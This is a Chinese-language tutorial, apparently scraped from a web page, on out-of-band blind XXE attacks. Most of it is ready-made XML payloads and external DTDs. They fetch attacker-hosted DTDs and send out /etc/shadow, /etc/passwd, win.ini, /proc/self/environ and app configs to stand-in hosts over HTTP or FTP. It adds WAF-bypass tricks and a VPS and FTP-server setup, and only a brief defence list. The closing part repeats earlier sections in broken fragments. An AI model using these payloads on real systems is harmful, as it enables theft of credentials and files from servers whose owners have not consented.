利用OOB XXE盲攻击获取文件系统访问权限 - 详细技术指南<\/h1>

1. XXE攻击概述<\/h2>
XXE (XML External Entity)攻击是一种利用XML解析器处理外部实体时的漏洞，攻击者可以通过构造恶意的XML文档来读取服务器上的任意文件、执行服务器端请求伪造(SSRF)等操作。<\/p>

2. 发现XXE漏洞的过程<\/h2>

2.1 初始侦察<\/h3>

对目标子域进行广泛扫描和目录枚举<\/li>
发现一个处理XML数据的端点<\/li>

通过GET请求观察到响应包含XML SOAP语法<\/li> <\/ul>

2.2 请求测试<\/h3>

发送POST请求时发现响应主体消失，但返回200状态码<\/li>
发送包含XML语法且Content-Type为application\/xml的请求<\/li>
观察到响应标签值变为"OK"而非"TestRequestCalled"<\/li>

测试JSON请求确认端点专门处理XML数据<\/li> <\/ol>

3. OOB (Out-of-Band) XXE盲攻击实施<\/h2>

3.1 基本准备<\/h3>

需要搭建VPS托管恶意DTD文件<\/li>

准备FTP服务器接收外泄数据<\/li> <\/ul>

3.2 攻击流程<\/h3>

构造恶意XML文档引用外部DTD<\/li>
DTD文件定义实体读取目标文件<\/li>

通过HTTP\/FTP协议将文件内容外泄<\/li> <\/ol>

4. 实用XXE攻击载荷<\/h2>

4.1 基础验证载荷<\/h3>

<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ELEMENT r ANY ><\/span>
<\/span><\/span><!ENTITY sp SYSTEM "http:\/\/x.x.x.x:443\/test.txt"><\/span>
<\/span><\/span>]>
<\/span><\/span><r><\/span>&sp;<\/r><\/span>
<\/span><\/span><\/code><\/pre>4.2 带外数据提取标准载荷<\/h3>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ELEMENT r ANY ><\/span>
<\/span><\/span><!ENTITY % sp SYSTEM "http:\/\/x.x.x.x:443\/ev.xml"><\/span>
<\/span><\/span>%sp;%param1;]>
<\/span><\/span><r><\/span>&exfil;<\/r><\/span>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY % data SYSTEM "file:\/\/\/c:\/windows\/win.ini"><\/span>
<\/span><\/span><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http:\/\/x.x.x.x:443\/?%data;'><\/span>">
<\/span><\/span><\/code><\/pre>4.3 .NET环境优化版本<\/h3>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ELEMENT r ANY ><\/span>
<\/span><\/span><!ENTITY % sp SYSTEM "http:\/\/x.x.x.x:443\/ev.xml"><\/span>
<\/span><\/span>%sp;%param1;%exfil;]>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY % data SYSTEM "file:\/\/\/c:\/windows\/win.ini"><\/span>
<\/span><\/span><!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http:\/\/x.x.x.x:443\/?%data;'><\/span>">
<\/span><\/span><\/code><\/pre>4.4 Linux系统文件提取<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ENTITY % data3 SYSTEM "file:\/\/\/etc\/shadow"><\/span>
<\/span><\/span><!ENTITY % sp SYSTEM "http:\/\/EvilHost:port\/sp.dtd"><\/span>
<\/span><\/span>%sp;%param3;%exfil;]>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp:\/\/Evilhost:port\/%data3;'><\/span>">
<\/span><\/span><\/code><\/pre>4.5 Java环境错误利用<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ENTITY % data3 SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span><!ENTITY % sp SYSTEM "http:\/\/x.x.x.x:8080\/ss5.dtd"><\/span>
<\/span><\/span>%sp;%param3;%exfil;]>
<\/span><\/span><r><\/r><\/span>
<\/span><\/span><\/code><\/pre>4.6 CDATA包装技术<\/h3>
<?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY % start "<![CDATA["><\/span>
<\/span><\/span><!ENTITY % stuff SYSTEM "file:\/\/\/usr\/local\/tomcat\/webapps\/customapp\/WEB-INF\/applicationContext.xml"><\/span>
<\/span><\/span><!ENTITY % end "]]><\/span>">
<\/span><\/span><!ENTITY % dtd SYSTEM "http:\/\/evil\/evil.xml"><\/span>
<\/span><\/span>%dtd;]>
<\/span><\/span><root><\/span>&all;<\/root><\/span>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY all "%start;%stuff;%end;"><\/span>
<\/span><\/span><\/code><\/pre>4.7 文件未找到异常利用<\/h3>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><!DOCTYPE test [
<\/span><\/span><\/span><!ENTITY % one SYSTEM "http:\/\/attacker.tld\/dtd-part"><\/span>
<\/span><\/span>%one;%two;%four;]>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY % three SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span><!ENTITY % two "<!ENTITY % four SYSTEM 'file:\/\/\/%three;'><\/span>">
<\/span><\/span><\/code><\/pre>4.8 FTP协议提取<\/h3>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE a [
<\/span><\/span><\/span><!ENTITY % asd SYSTEM "http:\/\/x.x.x.x:4444\/ext.dtd"><\/span>
<\/span><\/span>%asd;%c;]>
<\/span><\/span><a><\/span>&rrr;<\/a><\/span>
<\/span><\/span><\/code><\/pre>外部DTD文件内容：<\/p>
<!ENTITY % d SYSTEM "file:\/\/\/proc\/self\/environ"><\/span>
<\/span><\/span><!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp:\/\/x.x.x.x:2121\/%d;'><\/span>">
<\/span><\/span><\/code><\/pre>4.9 SOAP环境中的XXE<\/h3>
<soap:Body><foo><\/span>
<\/span><\/span><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http:\/\/x.x.x.x:22\/"> %dtd;]><xxx><\/xxx>]]><\/span>
<\/span><\/span><\/foo><\/soap:Body><\/span>
<\/span><\/span><\/code><\/pre>4.10 WAF绕过技术<\/h3>
<<\/span>!DOCTYPE :. SYSTEM "http:\/\/"
<\/span><\/span><<\/span>!DOCTYPE :_-_: SYSTEM "http:\/\/"
<\/span><\/span><<\/span>!DOCTYPE {0xdfbf} SYSTEM "http:\/\/"
<\/span><\/span><\/code><\/pre>5. 技术要点总结<\/h2>


盲XXE检测<\/strong>：即使没有直接响应，通过观察服务器行为变化可以判断XXE存在<\/p>
<\/li>

协议选择<\/strong>：<\/p>

HTTP协议适合小量数据传输<\/li>
FTP协议适合大数据量传输<\/li>
不同环境对协议支持不同，需测试<\/li>
<\/ul>
<\/li>

环境适配<\/strong>：<\/p>

.NET环境需要特殊处理<\/li>
Java环境可利用错误信息<\/li>
不同操作系统文件路径差异<\/li>
<\/ul>
<\/li>

数据外泄技巧<\/strong>：<\/p>

直接包含在URL参数中<\/li>
通过FTP传输<\/li>
利用CDATA包装特殊字符<\/li>
通过错误信息泄露<\/li>
<\/ul>
<\/li>

规避技术<\/strong>：<\/p>

使用非常规DOCTYPE语法绕过WAF<\/li>
编码特殊字符<\/li>
利用CDATA区段<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>

禁用XML外部实体处理<\/li>
使用安全的XML解析器配置<\/li>
实施严格的输入验证<\/li>
部署WAF规则检测XXE攻击<\/li>
限制服务器出站连接<\/li>
<\/ol>
7. 工具资源<\/h2>


XXE FTP服务器脚本：

https:\/\/github.com\/ONsec-Lab\/scripts\/blob\/master\/xxe-ftp-server.rb<\/p>
<\/li>

测试用VPS搭建指南：<\/p>

推荐使用DigitalOcean\/Linode等云服务<\/li>
需要开放HTTP\/FTP端口<\/li>
<\/ul>
<\/li>

监控工具：<\/p>

使用tcpdump或Wireshark监控外泄数据<\/li>
配置日志记录异常请求<\/li>
<\/ul>
<\/li>
<\/ol>

利用OOB XXE盲攻击获取文件系统访问权限 - 详细技术指南<\/h1>

1. XXE攻击概述<\/h2> XXE (XML External Entity)攻击是一种利用XML解析器处理外部实体时的漏洞，攻击者可以通过构造恶意的XML文档来读取服务器上的任意文件、执行服务器端请求伪造(SSRF)等操作。<\/p>

2. 发现XXE漏洞的过程<\/h2>

3. OOB (Out-of-Band) XXE盲攻击实施<\/h2>

4. 实用XXE攻击载荷<\/h2>

1. XXE攻击概述<\/h2>
XXE (XML External Entity)攻击是一种利用XML解析器处理外部实体时的漏洞，攻击者可以通过构造恶意的XML文档来读取服务器上的任意文件、执行服务器端请求伪造(SSRF)等操作。<\/p>